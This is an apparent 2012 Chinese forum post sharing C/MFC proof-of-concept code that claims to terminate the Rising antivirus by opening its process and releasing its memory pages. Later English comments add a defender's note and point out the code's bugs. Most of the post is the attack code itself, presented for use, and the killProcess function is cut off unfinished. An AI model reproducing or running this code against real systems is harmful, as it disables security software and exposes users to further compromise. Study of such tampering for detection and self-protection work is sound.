发表于:
2012-03-31 13:37
请确认此漏洞还存在吗?
编写成程序后双击运行即可直接K掉瑞星(重起也没用) 以下是漏洞利用代码 ------------------------------------------------------------------------------
// Forum-posted Win32 proof-of-concept (non-Unicode MFC build: LPCTSTR is
// passed straight to strcmp and CString appears below).  Three routines:
// two "find PID by image name" helpers and one that opens the named
// process and releases its memory pages until it is no longer running.
// Defender's note: nothing here needs more than being able to OpenProcess()
// the target with PROCESS_VM_OPERATION from an ordinary user process; a
// security product's self-protection is expected to deny exactly that, and
// a cross-process handle open with VM-write rights on a security product's
// process is a signal worth monitoring.
//
// The original was pasted as a single line, so its `//` comments swallowed
// the rest of the text; it is re-broken into lines here, tokens unchanged.

// Returns the PID of the first snapshot entry whose image file name equals
// `name` exactly, or 0 if nothing matches or the snapshot cannot be read.
// The entry filled in by Process32First is never compared (see loop below).
DWORD GetProcessIdFromName(LPCTSTR name) {
    PROCESSENTRY32 pe;
    DWORD id = 0;
    // Not checked against INVALID_HANDLE_VALUE; a failed snapshot is only
    // noticed when Process32First fails.
    HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
    pe.dwSize = sizeof(PROCESSENTRY32);
    // Early return leaks hSnapshot: CloseHandle is only reached below.
    if( !Process32First(hSnapshot,&pe) ) return 0;
    do {
        pe.dwSize = sizeof(PROCESSENTRY32);
        // Advances to the next entry before the first strcmp, so the entry
        // returned by Process32First is skipped.
        if( Process32Next(hSnapshot,&pe)==FALSE ) break;
        // strcmp: exact, case-sensitive match on the image file name only.
        if(strcmp(pe.szExeFile,name) == 0) {
            id = pe.th32ProcessID;
            break;
        }
    } while(1);
    CloseHandle(hSnapshot);
    return id;
}

// Second PID-by-name lookup; not called by killProcess in this excerpt.
// Unlike GetProcessIdFromName, mype.dwSize is never set before
// Process32First, and the snapshot handle is never closed on either
// return path.  Original comments were Chinese; translated here.
DWORD GetProcessID(char *FileName) {
    HANDLE myhProcess;
    PROCESSENTRY32 mype;
    BOOL mybRet;
    // Take a process snapshot.
    myhProcess=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
    // TH32CS_SNAPPROCESS snapshots all processes.
    // Start the process enumeration.
    mybRet=Process32First(myhProcess,&mype);
    // Compare in a loop to obtain the ProcessID.
    while(mybRet) {
        if(strcmp(FileName,mype.szExeFile)==0) return mype.th32ProcessID;
        else mybRet=Process32Next(myhProcess,&mype);
    }
    return 0;
}

// Opens the process named `name` and calls VirtualFreeEx(MEM_RELEASE) on
// successive page addresses until GetExitCodeProcess stops reporting
// STILL_ACTIVE.  `www` and `xyz` are never used.  A PID of 0 (no match)
// is not rejected, the OpenProcess result is not checked for NULL, and no
// WriteProcessMemory / GetExitCodeProcess / VirtualFreeEx result is
// examined.  NOTE: the function's closing brace lies outside this excerpt,
// so whether hProcess is ever closed cannot be seen here.
void killProcess(CString www ,LPCTSTR name,char *xyz) {
    DWORD nPid = 0;
    HANDLE hProcess;
    DWORD nExitCode = 0;
    DWORD nAddress = 0x1000;
    nPid=GetProcessIdFromName(name);
    hProcess = OpenProcess (PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION, 0,nPid);
    // Writes the first byte of nPid (its low byte on x86) to a fixed
    // address in the target; what lives at 0x0047EB17 in the targeted
    // build is not shown on the page.
    WriteProcessMemory(hProcess,(LPVOID)0x0047EB17,&nPid,1,NULL);
    // Walk up through the 32-bit user-mode address range one page at a time.
    while ( nAddress <= 0x7FFFF000 ) {
        // Return value unchecked: if this call fails, nExitCode keeps its
        // previous value (initially 0, which is != STILL_ACTIVE).
        GetExitCodeProcess(hProcess, &nExitCode);
        if (nExitCode != STILL_ACTIVE) {
            break;
        }
        WriteProcessMemory(hProcess,(LPVOID)0x0047EB17,&nPid,1,NULL);
        // 0x8000 is MEM_RELEASE.  Per the API contract (not shown here)
        // it only succeeds when nAddress is the base of a reserved region,
        // so most iterations are presumably failed no-ops.
        VirtualFreeEx(hProcess, (LPVOID)nAddress, 0, 0x8000);
        nAddress += 0x1000;
    }